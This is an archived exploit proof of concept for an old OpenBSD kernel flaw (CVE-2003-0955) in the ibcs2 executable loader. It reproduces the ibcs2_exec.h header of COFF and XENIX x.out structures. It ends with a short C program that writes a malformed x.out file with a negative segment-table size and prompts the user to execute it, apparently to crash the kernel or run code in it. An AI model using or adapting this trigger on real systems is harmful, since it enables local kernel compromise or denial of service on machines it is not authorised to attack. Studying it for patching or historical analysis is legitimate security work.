OpenBSD - 'ibcs2_exec' Kernel Code Execution - CVE-2003-0955

1. //
2. // Patch ftp://ftp.openbsd.org/pub/OpenBSD/patches/3.4/common/005_exec.patch
3. //
4. #include <sys/types.h>
5. #include <sys/stat.h>
6. #include <fcntl.h>
7. #include <stdio.h>
8. /* $OpenBSD: ibcs2_exec.h,v 1.3 2002/03/14 01:26:50 millert Exp $ */
9. /* $NetBSD: ibcs2_exec.h,v 1.4 1995/03/14 15:12:24 scottb Exp $ */
10.  
11. /*
12.  * Copyright (c) 1994, 1995 Scott Bartram
13.  * All rights reserved.
14.  *
15.  * adapted from sys/sys/exec_ecoff.h
16.  * based on Intel iBCS2
17.  *
18.  * Redistribution and use in source and binary forms, with or without
19.  * modification, are permitted provided that the following conditions
20.  * are met:
21.  * 1. Redistributions of source code must retain the above copyright
22.  * notice, this list of conditions and the following disclaimer.
23.  * 2. Redistributions in binary form must reproduce the above copyright
24.  * notice, this list of conditions and the following disclaimer in the
25.  * documentation and/or other materials provided with the distribution.
26.  * 3. The name of the author may not be used to endorse or promote products
27.  * derived from this software without specific prior written permission
28.  *
29.  * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS OR
30.  * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES
31.  * OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
32.  * IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY DIRECT, INDIRECT,
33.  * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
34.  * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
35.  * DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
36.  * THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
37.  * (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF
38.  * THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
39.  */
40.  
41. #ifndef _IBCS2_EXEC_H_
42. #define _IBCS2_EXEC_H_
43.  
44. /*
45.  * COFF file header
46.  */
47.  
48. struct coff_filehdr {
49.     u_short f_magic; /* magic number */
50.     u_short f_nscns; /* # of sections */
51.     long f_timdat; /* timestamp */
52.     long f_symptr; /* file offset of symbol table */
53.     long f_nsyms; /* # of symbol table entries */
54.     u_short f_opthdr; /* size of optional header */
55.     u_short f_flags; /* flags */
56. };
57.  
58. /* f_magic flags */
59. #define COFF_MAGIC_I386 0x14c
60.  
61. /* f_flags */
62. #define COFF_F_RELFLG 0x1
63. #define COFF_F_EXEC 0x2
64. #define COFF_F_LNNO 0x4
65. #define COFF_F_LSYMS 0x8
66. #define COFF_F_SWABD 0x40
67. #define COFF_F_AR16WR 0x80
68. #define COFF_F_AR32WR 0x100
69.  
70. /*
71.  * COFF system header
72.  */
73.  
74. struct coff_aouthdr {
75.     short a_magic;
76.     short a_vstamp;
77.     long a_tsize;
78.     long a_dsize;
79.     long a_bsize;
80.     long a_entry;
81.     long a_tstart;
82.     long a_dstart;
83. };
84.  
85. /* magic */
86. #define COFF_OMAGIC 0407 /* text not write-protected; data seg
87. is contiguous with text */
88. #define COFF_NMAGIC 0410 /* text is write-protected; data starts
89. at next seg following text */
90. #define COFF_ZMAGIC 0413 /* text and data segs are aligned for
91. direct paging */
92. #define COFF_SMAGIC 0443 /* shared lib */
93.  
94. /*
95.  * COFF section header
96.  */
97.  
98. struct coff_scnhdr {
99.     char s_name[8];
100.     long s_paddr;
101.     long s_vaddr;
102.     long s_size;
103.     long s_scnptr;
104.     long s_relptr;
105.     long s_lnnoptr;
106.     u_short s_nreloc;
107.     u_short s_nlnno;
108.     long s_flags;
109. };
110.  
111. /* s_flags */
112. #define COFF_STYP_REG 0x00
113. #define COFF_STYP_DSECT 0x01
114. #define COFF_STYP_NOLOAD 0x02
115. #define COFF_STYP_GROUP 0x04
116. #define COFF_STYP_PAD 0x08
117. #define COFF_STYP_COPY 0x10
118. #define COFF_STYP_TEXT 0x20
119. #define COFF_STYP_DATA 0x40
120. #define COFF_STYP_BSS 0x80
121. #define COFF_STYP_INFO 0x200
122. #define COFF_STYP_OVER 0x400
123. #define COFF_STYP_SHLIB 0x800
124.  
125. /*
126.  * COFF shared library header
127.  */
128.  
129. struct coff_slhdr {
130. long entry_len; /* in words */
131. long path_index; /* in words */
132. char sl_name[1];
133. };
134.  
135. #define COFF_ROUND(val, by) (((val) + by - 1) & ~(by - 1))
136.  
137. #define COFF_ALIGN(a) ((a) & ~(COFF_LDPGSZ - 1))
138.  
139. #define COFF_HDR_SIZE \
140. (sizeof(struct coff_filehdr) + sizeof(struct coff_aouthdr))
141.  
142. #define COFF_BLOCK_ALIGN(ap, value) \
143.         (ap->a_magic == COFF_ZMAGIC ? COFF_ROUND(value, COFF_LDPGSZ) : \
144.          value)
145.  
146. #define COFF_TXTOFF(fp, ap) \
147.         (ap->a_magic == COFF_ZMAGIC ? 0 : \
148.          COFF_ROUND(COFF_HDR_SIZE + fp->f_nscns * \
149. sizeof(struct coff_scnhdr), COFF_SEGMENT_ALIGNMENT(ap)))
150.  
151. #define COFF_DATOFF(fp, ap) \
152.         (COFF_BLOCK_ALIGN(ap, COFF_TXTOFF(fp, ap) + ap->a_tsize))
153.  
154. #define COFF_SEGMENT_ALIGN(ap, value) \
155.         (COFF_ROUND(value, (ap->a_magic == COFF_ZMAGIC ? COFF_LDPGSZ : \
156.          COFF_SEGMENT_ALIGNMENT(ap))))
157.  
158. #define COFF_LDPGSZ 4096
159.  
160. #define COFF_SEGMENT_ALIGNMENT(ap) 4
161.  
162. #define COFF_BADMAG(ex) (ex->f_magic != COFF_MAGIC_I386)
163.  
164. #define IBCS2_HIGH_SYSCALL(n) (((n) & 0x7f) == 0x28)
165. #define IBCS2_CVT_HIGH_SYSCALL(n) (((n) >> 8) + 128)
166.  
167. struct exec_package;
168. int exec_ibcs2_coff_makecmds(struct proc *, struct exec_package *);
169.  
170. /*
171.  * x.out (XENIX)
172.  */
173.  
174. struct xexec {
175. u_short x_magic; /* magic number */
176. u_short x_ext; /* size of extended header */
177. long x_text; /* ignored */
178. long x_data; /* ignored */
179. long x_bss; /* ignored */
180. long x_syms; /* ignored */
181. long x_reloc; /* ignored */
182. long x_entry; /* executable entry point */
183. char x_cpu; /* processor type */
184. char x_relsym; /* ignored */
185. u_short x_renv; /* flags */
186. };
187.  
188. /* x_magic flags */
189. #define XOUT_MAGIC 0x0206
190.  
191. /* x_cpu flags */
192. #define XC_386 0x004a /* 386, word-swapped */
193.  
194. /* x_renv flags */
195. #define XE_V5 0xc000
196. #define XE_SEG 0x0800
197. #define XE_ABS 0x0400
198. #define XE_ITER 0x0200
199. #define XE_VMOD 0x0100
200. #define XE_FPH 0x0080
201. #define XE_LTEXT 0x0040
202. #define XE_LDATA 0x0020
203. #define XE_OVER 0x0010
204. #define XE_FS 0x0008
205. #define XE_PURE 0x0004
206. #define XE_SEP 0x0002
207. #define XE_EXEC 0x0001
208.  
209. /*
210.  * x.out extended header
211.  */
212.  
213. struct xext {
214. long xe_trsize; /* ignored */
215. long xe_drsize; /* ignored */
216. long xe_tbase; /* ignored */
217. long xe_dbase; /* ignored */
218. long xe_stksize; /* stack size if XE_FS set in x_renv */
219. long xe_segpos; /* offset of segment table */
220. long xe_segsize; /* segment table size */
221. long xe_mdtpos; /* ignored */
222. long xe_mdtsize; /* ignored */
223. char xe_mdttype; /* ignored */
224. char xe_pagesize; /* ignored */
225. char xe_ostype; /* ignored */
226. char xe_osvers; /* ignored */
227. u_short xe_eseg; /* ignored */
228. u_short xe_sres; /* ignored */
229. };
230.  
231. /*
232.  * x.out segment table
233.  */
234.  
235. struct xseg {
236. u_short xs_type; /* segment type */
237. u_short xs_attr; /* attribute flags */
238. u_short xs_seg; /* segment selector number */
239. char xs_align; /* ignored */
240. char xs_cres; /* ignored */
241. long xs_filpos; /* offset of this segment */
242. long xs_psize; /* physical segment size */
243. long xs_vsize; /* virtual segment size */
244. long xs_rbase; /* relocation base address */
245. u_short xs_noff; /* ignored */
246. u_short xs_sres; /* ignored */
247. long xs_lres; /* ignored */
248. };
249.  
250. /* xs_type flags */
251. #define XS_TNULL 0 /* unused */
252. #define XS_TTEXT 1 /* text (read-only) */
253. #define XS_TDATA 2 /* data (read-write) */
254. #define XS_TSYMS 3 /* symbol table (noload) */
255. #define XS_TREL 4 /* relocation segment (noload) */
256. #define XS_TSESTR 5 /* string table (noload) */
257. #define XS_TGRPS 6 /* group segment (noload) */
258.  
259. #define XS_TIDATA 64
260. #define XS_TTSS 65
261. #define XS_TLFIX 66
262. #define XS_TDNAME 67
263. #define XS_TDTEXT 68
264. #define XS_TDFIX 69
265. #define XS_TOVTAB 70
266. #define XS_T71 71
267. #define XS_TSYSTR 72
268.  
269. /* xs_attr flags */
270. #define XS_AMEM 0x8000 /* memory image */
271. #define XS_AITER 0x0001 /* iteration records */
272. #define XS_AHUGE 0x0002 /* unused */
273. #define XS_ABSS 0x0004 /* uninitialized data */
274. #define XS_APURE 0x0008 /* read-only (sharable) segment */
275. #define XS_AEDOWN 0x0010 /* expand down memory segment */
276. #define XS_APRIV 0x0020 /* unused */
277. #define XS_A32BIT 0x0040 /* 32-bit text/data */
278.  
279. /*
280.  * x.out iteration record
281.  */
282.  
283. struct xiter {
284. long xi_size; /* text/data size */
285. long xi_rep; /* number of replications */
286. long xi_offset; /* offset within segment to replicated data */
287. };
288.  
289. #define XOUT_HDR_SIZE (sizeof(struct xexec) + sizeof(struct xext))
290.  
291. int exec_ibcs2_xout_makecmds(struct proc *, struct exec_package *);
292.  
293. #endif /* !_IBCS2_EXEC_H_ */
294.  
295. int main(int ac,char **av)
296. {
297. int fd;
298. struct xexec xp;
299. struct xext xep;
300. char exe[10];
301. char fil[]="./vvc";
302.  
303. fd=open(fil,O_CREAT|O_RDWR,0700);
304. if (fd==-1) {perror("open");return 1;}
305. memset(&xp,0,sizeof(xp));
306. memset(&xep,0,sizeof(xep));
307. memset(exe,'v',sizeof(exe));
308. xp.x_magic = XOUT_MAGIC;
309. xp.x_cpu = XC_386;
310. xp.x_renv = XE_EXEC;
311. xp.x_ext = sizeof(xep);
312. xep.xe_segsize = -1;
313. write(fd,&xp,sizeof(xp));
314. write(fd,&xep,sizeof(xep));
315. write(fd,exe,sizeof(exe));
316. printf("Now exec %s\n",fil);
317.  
318. }
319.  
320. // milw0rm.com [2003-11-07]